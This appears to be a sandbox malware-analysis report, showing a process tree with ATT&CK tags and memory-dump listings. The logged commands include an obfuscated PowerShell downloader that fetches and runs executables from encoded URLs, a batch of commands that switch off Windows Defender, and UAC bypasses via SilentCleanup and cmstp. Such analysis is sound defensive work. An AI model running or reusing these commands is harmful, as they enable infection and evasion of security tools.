        "C:\Users\Admin\AppData\Local\Temp\fYDz9wNnYe.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5512
        
        C:\Users\Admin\AppData\Local\Temp\fYDz9wNnYe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fYDz9wNnYe.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5660
        
        \??\c:\windows\SysWOW64\cmstp.exe
        
        "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\kibbhhvr.inf
        12⤵
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\a0k7SvAzhM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a0k7SvAzhM.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\a0k7SvAzhM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a0k7SvAzhM.exe"
        11⤵
        Executes dropped EXE
        Windows security modification
        
        PID:5852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" Get-MpPreference -verbose
        12⤵
        
        PID:2156
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\nqu.exe"
        10⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        11⤵
        Delays execution with timeout.exe
        
        PID:6028
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        6⤵
        
        PID:4868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3272
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        6⤵
        Delays execution with timeout.exe
        
        PID:196
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        6⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        7⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:4412
        
        C:\Users\Public\ejf.exe
        
        "C:\Users\Public\ejf.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:4240
        
        C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Checks processor information in registry
        
        PID:4404
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 4404 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\386531223269341\\* & exit
        11⤵
        
        PID:3440
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 4404
        12⤵
        Kills process with taskkill
        
        PID:804
        
        C:\Users\Public\ejf.exe
        
        "C:\Users\Public\ejf.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Drops desktop.ini file(s)
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe"
        11⤵
        Executes dropped EXE
        
        PID:3132
        
        C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe"
        11⤵
        Executes dropped EXE
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\9Dq25VPs74.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9Dq25VPs74.exe"
        10⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Modifies system certificate store
        
        PID:4504
        
        C:\Windows\SysWOW64\svchost.exe
        
        "C:\Windows\System32\svchost.exe"
        11⤵
        
        PID:4448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cKIeetso.bat" "
        12⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete hkcu\Environment /v windir /f
        13⤵
        Modifies registry key
        
        PID:4480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
        13⤵
        Modifies registry key
        
        PID:5584
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
        13⤵
        
        PID:4672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete hkcu\Environment /v windir /f
        13⤵
        Modifies registry key
        
        PID:5356
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cKIeetso.bat" "
        12⤵
        
        PID:5216
        
        C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        11⤵
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:4660
        
        C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe"
        11⤵
        Executes dropped EXE
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe"
        11⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:496
        
        \??\c:\windows\SysWOW64\cmstp.exe
        
        "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\yfny2ejf.inf
        12⤵
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\MYbv6sblhd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MYbv6sblhd.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\MYbv6sblhd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MYbv6sblhd.exe"
        11⤵
        Executes dropped EXE
        Windows security modification
        
        PID:1772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" Get-MpPreference -verbose
        12⤵
        
        PID:2920
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\ejf.exe"
        10⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        11⤵
        Delays execution with timeout.exe
        
        PID:4984
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        6⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        7⤵
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:4668

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:3904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Windows\temp\nynibecq.exe
  2⤵
  PID:3240
- - C:\Windows\temp\nynibecq.exe
    C:\Windows\temp\nynibecq.exe
    3⤵
    - Executes dropped EXE
    PID:3964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      4⤵
      PID:4316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      4⤵
      PID:3016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      4⤵
      PID:4480
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      4⤵
      PID:4664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      4⤵
      PID:5104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      4⤵
      PID:1896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      4⤵
      PID:3828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      4⤵
      PID:4912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      4⤵
      PID:5168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      4⤵
      PID:5260
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      4⤵
      PID:5416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      4⤵
      PID:5504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      PID:5620
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /IM cmstp.exe /F
  2⤵
  - Kills process with taskkill
  PID:2444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Windows\temp\2eurzuuj.exe
  2⤵
  PID:5476
- - C:\Windows\temp\2eurzuuj.exe
    C:\Windows\temp\2eurzuuj.exe
    3⤵
    - Executes dropped EXE
    PID:5848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      4⤵
      PID:2968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      4⤵
      PID:5704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      4⤵
      PID:5724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      4⤵
      PID:6060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      4⤵
      PID:5608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      4⤵
      PID:5240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      4⤵
      PID:5132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      4⤵
      PID:5688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      4⤵
      PID:5380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      4⤵
      PID:5904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      4⤵
      PID:4168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      4⤵
      PID:6020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      PID:6196
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /IM cmstp.exe /F
  2⤵
  - Kills process with taskkill
  PID:3084

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Security Software Discovery

T1063

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/496-620-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/496-624-0x000000006E950000-0x000000006F03E000-memory.dmp

Filesize
6.9MB

Download
memory/552-614-0x000000006E950000-0x000000006F03E000-memory.dmp

Filesize
6.9MB

Download
memory/552-610-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/556-122-0x000000006E950000-0x000000006F03E000-memory.dmp

Filesize
6.9MB

Download
memory/556-204-0x0000000008870000-0x0000000008871000-memory.dmp

Filesize
4KB

Download
memory/652-37-0x0000000002810000-0x0000000002912000-memory.dmp

Filesize
1.0MB

Download
memory/652-38-0x0000000002C60000-0x00000000030A0000-memory.dmp

Filesize
4.2MB

Download
memory/652-32-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/652-35-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/720-305-0x0000000008D60000-0x0000000008D74000-memory.dmp

Filesize
80KB

Download
memory/720-293-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

Filesize
4KB

Download
memory/720-740-0x0000000009EE0000-0x0000000009F9A000-memory.dmp

Filesize
744KB

Download
memory/720-302-0x0000000009100000-0x0000000009101000-memory.dmp

Filesize
4KB

Download
memory/720-300-0x0000000005880000-0x0000000005881000-memory.dmp

Filesize
4KB

Download
memory/720-291-0x000000006E950000-0x000000006F03E000-memory.dmp

Filesize
6.9MB

Download
memory/720-741-0x000000000A040000-0x000000000A041000-memory.dmp

Filesize
4KB

Download
memory/748-1174-0x0000000003530000-0x0000000003531000-memory.dmp

Filesize
4KB

Download
memory/1096-645-0x00000000046D0000-0x00000000046D1000-memory.dmp

Filesize
4KB

Download
memory/1096-647-0x00000000047D0000-0x00000000048D1000-memory.dmp

Filesize
1.0MB

Download
memory/1288-395-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-59-0x0000000004E30000-0x0000000004F32000-memory.dmp

Filesize
1.0MB

Download
memory/1288-418-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-419-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-420-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-414-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-421-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-422-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-423-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-401-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-424-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-425-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-426-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-429-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-416-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-433-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-435-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-322-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-324-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-325-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-436-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-412-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-326-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-327-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-410-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-409-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-328-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-329-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-430-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-330-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-427-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-247-0x0000000004E30000-0x0000000004F32000-memory.dmp

Filesize
1.0MB

Download
memory/1288-384-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-381-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-243-0x0000000004E30000-0x0000000004F32000-memory.dmp

Filesize
1.0MB

Download
memory/1288-240-0x0000000004E30000-0x0000000004F32000-memory.dmp

Filesize
1.0MB

Download
memory/1288-238-0x0000000004E30000-0x0000000004F32000-memory.dmp

Filesize
1.0MB

Download
memory/1288-235-0x0000000004E30000-0x0000000004F32000-memory.dmp

Filesize
1.0MB

Download
memory/1288-232-0x0000000004E30000-0x0000000004F32000-memory.dmp

Filesize
1.0MB

Download
memory/1288-371-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-230-0x0000000004E30000-0x0000000004F32000-memory.dmp

Filesize
1.0MB

Download
memory/1288-331-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-367-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-366-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-364-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-360-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-357-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-354-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-352-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-350-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-347-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-408-0x00000000005C0000-0x00000000005CD000-memory.dmp

Filesize
52KB

Download
memory/1288-344-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-343-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-342-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-338-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-323-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-222-0x0000000004E30000-0x0000000004F32000-memory.dmp

Filesize
1.0MB

Download
memory/1288-404-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-407-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-406-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-405-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-403-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-402-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-400-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-399-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
memory/1288-397-0x0000000004E30000-0x0000000004E32000-memory.dmp

Filesize
8KB

Download
